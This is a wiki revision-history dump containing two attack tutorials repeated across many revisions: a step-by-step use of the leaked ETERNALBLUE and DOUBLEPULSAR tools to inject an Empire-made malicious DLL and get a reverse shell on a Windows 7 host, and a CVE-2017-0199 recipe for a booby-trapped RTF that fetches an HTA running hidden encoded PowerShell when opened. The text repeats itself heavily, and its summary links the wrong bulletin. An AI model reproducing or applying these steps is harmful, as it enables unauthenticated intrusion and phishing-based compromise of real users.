- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

NSA - MS17-010

2017-05-02T19:10:14Z

Lphanvan: /* Why Eternalblue & DoublePulsar? */

== Microsoft Security Bulletin MS17-010 - NSA Tool leak ==

Author: Ender Loc Phan

Video Proof:

=== Introduction ===

At last April 8, TheShadowBrokers has published a bunch of tools that was stolen from the NSA Arsenal
Hacker Tools. A Github repository is the following: https://github.com/misterch0c/shadowbroker.
In this paper, we’ll focus on ETERNALBLUE exploit for Microsoft Windows and the plugin
DOUBLEPULSAR. To leverage these “fantastic” codes, we’ll be using FUZZBUNCH, The NSA’s
“Metasploit”

Affected Software:

[[File:Capture17.PNG]]

=== Why Eternalblue & DoublePulsar? ===

An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server.
To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.
The security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.

ETERNALBLUE is the only one that can be used to attacking Windows 7 and Windows Server 2008 without needing authentication. After that, we
can use the plugin DOUBLEPULSAR in order that injecting remotely a malicious DLL on the target
machine.We wi ll make a malicious DLL using Empire to get
a reverse connection from the target to the attacker machine.

=== Setting up Environment ===

'''Attacker:'''

- Windows 7 ( To execute NSA tool ): '''192.168.0.106'''

- Kali Linux ( To generate DLL file and being a listener https://github.com/EmpireProject/Empire ): '''192.168.0.109'''

'''Victim:'''

- Windows 7/SVR2008 : '''192.168.0.107'''

=== Setting up the FuzzBunch ===

We are going to use FUZZBUNCH, the NSA’s “Metasploit”. As mentioned above, this framework was
coded with Python 2.6 and it uses an old version of PyWin32: v2.12.

Knowing that, we must install the following tools in our Windows XP attacker machine:

- Python 2.6: https://www.python.org/download/releases/2.6/ (add it to the Windows’ PATH
environment variable)

- PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/

- Notepad++: https://notepad-plus-plus.org/download/ (You can also use Notepad).

All of them are executable installers so we can just press “next, next, next, accept, next…”.

When we finish our installations, we must open a cmd.exe and move to the folder where the tool was
downloaded, punctually where the FUZZBUNCH: “fb.py” is (inside the folder shadowbrokermaster/Windows) and then execute “python fb.py”.

You will see that it won’t run correctly, the script will show you an error because it’s not finding the
directory named “ListeningPost”. This happens because inside the leak that specific folder is empty. So,
to avoid that error we edit “fb.py” and simply comment the line number 72:

[[File:Capture.PNG]]

After that, we proceed to open the Fuzzbunch.xml file that is inside the same folder in order that replace
the paths on the line 19 and 24 for other ones that we could have in our own system, for example:

[[File:Capture2.PNG]]

=== Executing the FuzzBunch ===

Now, we can execute again the command “python fb.py” and we should see that FUZZBUNCH is doing it
correctly:

[[File:Capture3.PNG]]

When we initialize FUZZBUNCH, it will ask for a target IP address, we must write our target IP (Windows
7/2008 machine).

Immediately, it will ask for a callback’s IP, we must specify the attacker IP (Windows XP machine).

[[File:Capture4.PNG]]

Press “enter” to continue and it will ask for a name to the project. We used the one already created
"eternal1". If you don’t have any, press “enter” to be asked for a name. With that data, the log folder for
that project will be created.

[[File:Capture5.PNG]]

=== Using EternalBlue framework ===

The first step is to select the exploit that we are going to use, which is ETERNALBLUE. So, we’ll execute
on the FUZZBUNCH terminal: “use EternalBlue”.

[[File:Capture6.PNG]]

From this point, we’ll use by default configurations in every parameter, EXCEPT at the following:

[[File:Capture7.PNG]]

Finally, it will ask us if we want to run ETERNALBLUE

If all was as we expected, we should see the message “Eternalblue Succeeded”.

[[File:Capture8.PNG]]

=== Generating malicious DLL by using Empire===

At this step, we need to create a malicious DLL (the Payload) which we’ll use with DOUBLEPULSAR to
remotely inject it into the target’s system previously impacted with ETERNALBLUE.

To create the DLL, we need to move to the Linux attacker machine where we have installed the Empire
framework.

Step 1: Set up a listener that can receive the reverse connection when the DLL is being injected

[[File:Capture9.PNG]]

Note: The IP address that we must to set at “Host” parameter is from the Linux attacker machine.

Step 2: Create the malicious DLL

[[File:Capture10.PNG]]

Now we have our malicious DLL in /tmp/launcher.dll, we should simply copy that DLL to the Windows XP
attacker machine so we can use it with FUZZBUNCH.

=== Injecting the malicious DLL via DoublePulsar ===

Going back to the Windows XP attacker machine, we now run “use DoublePulsar” on the FUZZBUNCH
terminal.

[[File:Capture11.PNG]]

Again, we’ll use every parameter with default configuration stopping when we reached the following:

[[File:Capture12.PNG]]

We must select the architecture of the Windows 7/2008 target machine that we are going to impact (in
my case it is x64). Then, we’ll do the most important part of this step, we are going to indicate that we
want to perform a DLL injection (Option 2 – “RunDLL”).

The framework will ask us for the local path where our malicious DLL is located (which is the one we
created with Empire and we copied to Windows XP attacker machine). The following parameters must
be used with default configuration.

Finally, it will ask us if we want to run DOUBLEPULSAR.

[[File:Capture13.PNG]]

And if everything works cool…

[[File:Capture14.PNG]]

=== Getting Empire session ===

[[File:Capture15.PNG]]

Interact with victim

[[File:Capture16.PNG]]

'''WE WIN!!!!!!'''

== Summary ==

Finally, we’ve obtained a Meterpreter shell on a Windows 7 SP1 x64 without needing for user
interaction, just with knowing its IP.

Vulnerability detail:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:42:32Z

Lphanvan: /* Step 1 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script>
a=new ActiveXObject("WScript.Shell");
a.run('chrome https://www.youtube.com/watch?v=bp0AHQooVSY',0);
window.close();
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>

===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===
The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 6 ===
At this step, if the user opens the "exploit.rtf" file he will have to double click on the link object to launch the attack...

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

[[File:5.png]]

to

<pre> \object\objautlink\objupdate\rsltpict..........................</pre>

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:41:34Z

Lphanvan: /* Step 6 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===
The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 6 ===
At this step, if the user opens the "exploit.rtf" file he will have to double click on the link object to launch the attack...

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

[[File:5.png]]

to

<pre> \object\objautlink\objupdate\rsltpict..........................</pre>

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:41:18Z

Lphanvan: /* Step 6 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===
The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 6 ===
At this step, if the user opens the "exploit.rtf" file he will have to double click on the link object to launch the attack...

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

[[File:5.png]]

to
\object\objautlink\objupdate\rsltpict..........................

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:40:24Z

Lphanvan: /* Step 6 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===
The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 6 ===
At this step, if the user opens the "exploit.rtf" file he will have to double click on the link object to launch the attack...

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

[[File:5upload.png]]

to
\object\objautlink\objupdate\rsltpict..........................

File:5.png

2017-05-02T18:39:32Z

Lphanvan: Lphanvan uploaded a new version of File:5.png

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:38:31Z

Lphanvan: /* Step 5 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===
The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 6 ===

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:38:27Z

Lphanvan: /* Step 4 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

===Step 5 ===

===Step 6 ===

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:38:03Z

Lphanvan: /* Step 5 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 5 ===

===Step 6 ===

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:37:26Z

Lphanvan: /* Step 4 */

==CVE-2017-0199 Malicious RTF Document==
===Step 1 ===
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let's call it "ms.hta"

<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>

</pre>
===Step 2 ===
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>

The following directive will :
- Add "Content-Type application/rtf to all files in /ms
- Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<pre>

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
</pre>

<pre> service apache2 restart </pre>

===Step 4 ===
Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object

[[File:Capture1-wiki.PNG]]

After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

The following step will :
- change the ms.rtf that we have included with the custom HTA payload
- The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart

===Step 5 ===
===Step 6 ===

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:36:45Z

Lphanvan: /* Step 4 */

File:Capture1-wiki.PNG

2017-05-02T18:36:03Z

Lphanvan:

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:34:28Z

Lphanvan: /* Step 3 */

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:33:50Z

Lphanvan: /* Step 3 */

CVE-2017-0199 Malicious RTF Document

2017-05-02T18:33:27Z

Lphanvan: /* Step 2 */

CVE-2017-0199 Malicious RTF Document

